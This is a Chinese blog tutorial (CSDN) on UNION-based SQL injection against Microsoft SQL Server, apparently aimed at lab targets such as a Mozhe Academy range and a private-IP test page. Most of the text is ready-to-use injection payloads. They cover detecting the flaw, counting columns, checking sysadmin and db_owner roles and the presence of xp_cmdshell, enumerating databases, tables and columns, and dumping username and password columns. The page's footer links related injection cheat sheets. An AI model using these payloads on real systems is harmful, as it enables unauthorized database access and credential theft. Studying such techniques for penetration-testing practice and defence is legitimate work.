Sql server注入分类之联合注入

最新推荐文章于 2024-03-17 12:15:00 发布
最新推荐文章于 2024-03-17 12:15:00 发布
阅读量409 收藏 1
点赞数
文章标签: mssql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42990434/article/details/111298770
版权

本章目录:

联合查询注入语句

  • 第一步 判断注入

    and 1=1

    and 1=2

  • 第二步 猜解列数(字段长度)

    order by 1 返回正确

    order by 2 返回正确

    order by 3 出现错误

    ?id=-2union all select null,null,null,null--
    //在第四个的时候页面显示正常,说明字段为4

    ?id=2and 1=(select is_srvrolemember(‘sysadmin’))
    //判断是否是系统管理员

    ?id=2and 1=(select is_srvrolemember(‘db_owner’))
    //判断是否是库权限

    ?id=2and 1=(select is_srvrolemember(‘public’))
    //判断是否为public权限

    可以直接不用加 - 报错

    判断回显位的位置:?id=-2union all select ‘1’,‘2’,‘3’,‘4’-- 页面显示2,3,说明回显点为2,3字段处

利用回显点权限判断

?id=-1073UNION ALL SELECT NULL, 回显点 ,NULL,NULL--
//一般都是代入在这语句的回显点中

其实这里面在后面添加的--或者#是因为代入数据库查询的时候系统可能会给你附加一些语句,这些语句都有可能会影响你的代码,所以就可以加这个注释掉。

  • @@version //主机版本

  • system_user //系统用户名

  • suser_sname() //查出当前操作数据库的登入名

  • user //当前用户名

  • db_name() //当前数据库名

    db_name(7) //快速查询库名,1-6为系统库,7开始为其他库

  • (select host_name()) //主机名

  • (select count(*) from master.dbo.sysobjects where xtype=‘X’ and name=‘xp_cmdshell’)

//判断是否有xp_cmdshell扩展存储,1为存在

  • 同理:(select count(*) from master.dbo.sysobjects where name=‘xp_regread’)

//判断是否有xp_regread扩展存储,1为存在

查库:

  • (select name from master.dbo.sysdatabases where dbid=7)
    //修改dbid数值,快速查询库名,1-6为系统库

查表:

  • (select top 1 name from sysobjects where xtype=‘U’) //查询当前库第一个表名

  • (select top 1 name from sysobjects where xtype=‘U’ and name not in (‘表名1’,‘表名2’)) //查询其他表

  • (select top 1 table_name from master.information_schema.tables) //查询master库第一个表名

  • (select top 1 name from bbs.dbo.sysobjects where xtype=‘U’) //查询bbs库第一个表名

  • (select top 1 table_name from information_schema.tables where table_name not in (‘表名1’,‘表名2’)) //查询其他表(不包括)

  • (select name from sysobjects where xtype=‘U’ FOR XML PATH(’’)) //快速查询所有表

  • (select ‘|’%2bname%2b’|’ from sysobjects where xtype=‘U’ FOR XML PATH(’’)) //快速查询所有表

同上一条,这是过滤用的,将空格编码化了

  • (select top 1 name from sysobjects where xtype=‘U’ and name not in(select top 0 name from sysobjects where xtype=‘u’))
    ///(select top 0 name from ) 变化0来快速查询

墨者学院例,查表名:
?id=-1073UNION ALL SELECT NULL,(SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=‘dbo’),NULL,NULL--
//结果:manage

查列名:

  • (select top 1 name from syscolumns where id=object_id(‘admin’))
    //查询当前库admin表的第一个列名

  • (select top 1 name from syscolumns where id=object_id(‘admin’) and name not in(‘列名1’,‘列名2’)
    //查询当前库admin表的其他列名(也是不包括原理)

  • (select top 1 column_name from information_schema.columns where table_name=‘admin’ and column_name not in(‘列名1’,‘列名2’))
    //查询当前库admin表的其他列名

  • (select name from syscolumns where id=object_id(‘admin’) FOR XML PATH(’’))
    //快速查询所有列

例:
?id=-2union all select ‘1’,(select top 1 col_name(object_id(‘manage’),3) from sysobjects),‘1’,‘1’--
//根据col_name()函数中的数字来决定显示的字段,1对应id,2对应username,3对应password

查列内容:

例:

  • ?id=-2union all select null,username,password,null from manage--
    ///直接代列名到回显点里面,然后from 表名--

  • (select password,username from manage FOR XML PATH(’’))
    //快速查询manage表里所有值

  • (select top 1 password from admin where password not in (‘值1’,‘值2’))
    //查询其他值

  • (select top 1 password from bbs.dbo.admin)
    //查询bbs库admin表password列的第一个值

-----------------------------------------------------------------------------------------------------------------

联合注入例:

mssql联合注入我们一般不使用 数字占位,而是null,因为你使用数字占位可能会发生隐式转换


http://192.168.130.137/1.aspx?id=1 union select 1,2,3

http://note.youdao.com/yws/public/resource/a8f33424280f1a9440b497f386b004fb/xmlnote/444F2206A5C945A3BBAE3956B2EE0EF7/F38094C18DB74056BB2B00539AC9AA3C/11954


http://192.168.130.137/1.aspx?id=1 union select null,name,pass from info

http://note.youdao.com/yws/public/resource/a8f33424280f1a9440b497f386b004fb/xmlnote/444F2206A5C945A3BBAE3956B2EE0EF7/8216FC733901409E93A0A4A7471DEA4D/11952

当然也可以这样用


http://192.168.130.137/1.aspx?id=1 SELECT 1 UNION (select CAST(USER as int))

http://note.youdao.com/yws/public/resource/a8f33424280f1a9440b497f386b004fb/xmlnote/444F2206A5C945A3BBAE3956B2EE0EF7/A29D1B4D80DC471590A226D2BD2FB3FF/11955

在mssql中我们如果想查询多条数据可以使用%2B 也就是加号

http://192.168.130.137/1.aspx?id=1 union select null,name%2Bpass,null from info

http://note.youdao.com/yws/public/resource/a8f33424280f1a9440b497f386b004fb/xmlnote/444F2206A5C945A3BBAE3956B2EE0EF7/9C25C6F56B7140F4B0C7EE127138F7A0/11953

玖飞
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
三步堵死 SQL Server注入漏洞
09-11
三步堵死 SQL Server 注入漏洞 SQL Server 注入漏洞是一种常见的 Web 应用程序安全漏洞,攻击者可以通过构造恶意的 SQL 语句来获取或修改数据库中的数据,以获取未经授权的访问权限。为防止 SQL Server 注入漏洞,...
SQLserver注入联合查询
一个普普通通的博客
03-02 791
SQLserver注入联合查询
Sql server注入分类之语句总结
qq_42990434的博客
12-16 3120
关于mssql注入语句,跟mysql也差不了多少,都是从information_scheam库中获取各种数据 基础语句 select ***://查询指令 @@version // 数据库版本 system_user //系统用户 suser_sname() //查出当前操作数据库的登入名,一般和触发器一起用来监控是谁对表做了操作 user //获取当前数据库用户名 db_name() // 当前数据库名 其中db_name(N)可以来遍历其他数据库
渗透常用SQL注入语句大全
滴水石穿
04-12 642
QL注入大全 Crack8小组 整理 1.判断有无注入点 ; and 1=1 and 1=2 2.猜表一般的表的名称无非是admin adminuser user pass password 等.. and 0<>(select count(*) from *) and 0<>(select count(*) from admin) ---判断是否存在admin这...
sql注入
qq_49714982的博客
04-06 1601
高版本:在MYSQL5.0以上版本存在一个自带数据库为information_schema,它是一个存储所有数据库名、表名、列名的数据库,相当于可以通过查询它获取指定数据库下面的表名、列名信息。id=1 and 1=2 union select 1,database(),user(),4)union select 1,2,3,4(几个列就写到几,并且让?id=1报错,比如id=-1或者 and 1=2)id=-1 union select 1,group_concat(数据项1),3,4 from。
SQL注入大全【实用收藏】
这个时代,作为程序员可能要学习小程序
07-05 1605
点击上方蓝色“终端研发部”,选择“设为星标”学最好的别人,做最好的我们 前言转:天禧信安 SQL注入的攻击方式根据应用程序处理数据库返回内容的不同,可以分为可显注入、报错注入和盲注。可显...
SQL注入语句和方法总结
叮当大猫猫
09-29 6667
一、SQL语法基础 SQL语法基础和Oracle注入技巧 https://pan.baidu.com/s/11EOTJ8nHrHqimF8nJJTDvA 提取码:4zep 二、SQL手工注入语句 1.判断是否有注入 ;and 1=1 ;and 1=2 2.初步判断是否是mssql ;and user>0 3.判断数据库系统 ;and (select count() from sysobjects)>0 mssql ;and (select count() from msysobjects)&gt
Sql serversql注入
12-14
 关于sql注入的危害在这里不多做介绍了,相信大家也知道其中的厉害关系。这里有一些sql注入的事件大家感兴趣可以看一下  防范sql注入的方法无非有以下几种:  1.使用类型安全的SQL参数  2.使用参数化输入...
sqlserver 数据库注入解决方案
09-11
SQL Server 数据库注入是一种常见的安全威胁,它发生在攻击者通过输入恶意SQL代码来操纵数据库系统,获取敏感信息或破坏数据。解决此类问题至关重要,以下是一些关键的防范措施和解决方案: 1. **输入验证**: ...
C# MVC 过滤器防止SQL注入
09-15
C# MVC 过滤器防止SQL注入
SQL Server手工注入方式
good good study
01-04 5718
本文详细的介绍了Sql Server安全基础,包括环境搭建,T-sql语法,sqlserver用户权限,以及sqlserver注入的方法和提权方式。 Microsoft SQL Server(微软结构化查询语言服务器),也叫Mssql,是由美国微软公司所推出的关系型数据库。默认端口号为1433常见版本如下版本年份发布名称8.02000年8.02003年SQL Server 2000 64-bit版本9.02005年10.02008年10.252009年SQL Azure。
【万字长文】SQL注入(非常详细)零基础入门到精通,收藏这一篇就够了
Libra1313的博客
03-17 6096
之前一直有粉丝朋友,在挖漏洞过程中使用到SQL注入,希望大白给他讲解一些的SQL注入,今天大白也特地给粉丝朋友安排好了SQL注入攻击方式根据应用程序处理数据库返回内容的不同,可以分为可显注入、报错注入和盲注。
Sql serversql注入
2301_78145678的博客
07-04 711
请注意,设计为在安全环境中运行的程序可能会被复制到不安全的环境中。因此,必须验证所有用户输入,并仔细检查在您所用的服务器中执行构造 SQL 命令的代码。(10)在可能据以构造文件名的字段中,不接受下列字符串:AUX、CLOCK、COM1到COM8、CON、CONFIG、LPT1 到 LPT8、NUL 以及 PRN。但是,如果下一层认为其输入已通过验证,则任何可以绕过客户端的恶意用户就可以不受限制地访问系统。(3)测试字符串变量的内容,只接受所需的值。(2)测试输入的大小和数据类型,强制执行适当的限制。
MSSQL手工注入常用语句
weixin_34107955的博客
10-21 89
自己整理了一些放到这里,以备不时之需。 [常规查询]and exists (select * from sysobjects) //判断是否是MSSQLand 1=convert(int,@@version) 或1=(select @@version) //判断数据库版本;declare @d int...
SQL 注入总结(详细)
于高山之巅,方见大河奔涌;于群峰之上,更觉长风浩荡。
01-21 5479
这篇文章是最近学习 SQL 注入后的笔记,里面整理了 SQL 常见的注入方式,供大家学习了解 SQL 注入的原理及方法,也方便后续自己回顾,如有什么错误的地方欢迎指出!
网络安全进阶学习第十四课——MSSQL注入
p36273的博客
08-07 2044
and 1=convert(int,(select quotename(name) from 数据库名.dbo.sysobjects where xtype=‘U’ FOR XML PATH(‘’))) –主要字段有:name(表名)、id(表 ID)、xtype(创建的对象)。and 1=(select top 1 * from 指定数据库.dbo.指定表名 where排除条件 FOR XML PATH(‘’))–举例:replace(‘1-a 2-b’,’-’, ’:’),返回结果是:1:a 2:b。
SQL Server 注入
mingyqf的博客
03-22 2398
SQL Server 注入 (转至:https://www.1024sou.com/article/798425.html) 侵删 一、简介 SQL Server数据库是由Microsoft开发和推广的关系数据库管理系统(DBMS),是一个比较大型的数据库。端口号为1433。数据库后缀名 .mdf,注释符是 – sa权限:数据库操作,文件管理,命令执行,注册表读取等 (数据库最高权限system) db权限:文件管理,数据库操作等权限 users-administrators **public权限:**数
【网络安全-SQL注入(4)】一篇文章带你了解sql server数据库三大权限,以及三大权限的SQL注入SQL注入点利用以及getshell
m0_67844671的博客
10-02 2156
【网络安全-SQL注入SQL注入----一篇文章教你access数据库SQL注入以及注入点利用。SQL注入【3】-CSDN博客本篇文章以凡诺企业网站管理系统为例,讲解了access数据库是如何进行SQL注入的,以及注入点如何利用,如何判断查询字段个数,如果用联合查询爆出数据库数据等;【网络安全-SQL注入SQL注入----一篇文章教你access数据库SQL注入以及注入点利用。SQL注入【3】;
sql server注入查询数据库
最新发布
06-04
SQL Server注入是指攻击者利用程序对输入数据没有进行充分检查过滤的漏洞,向程序中注入恶意的SQL语句,从而达到控制数据库的目的。攻击者可以通过SQL Server注入的方式获取、修改、删除数据库中的数据。 下面是...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值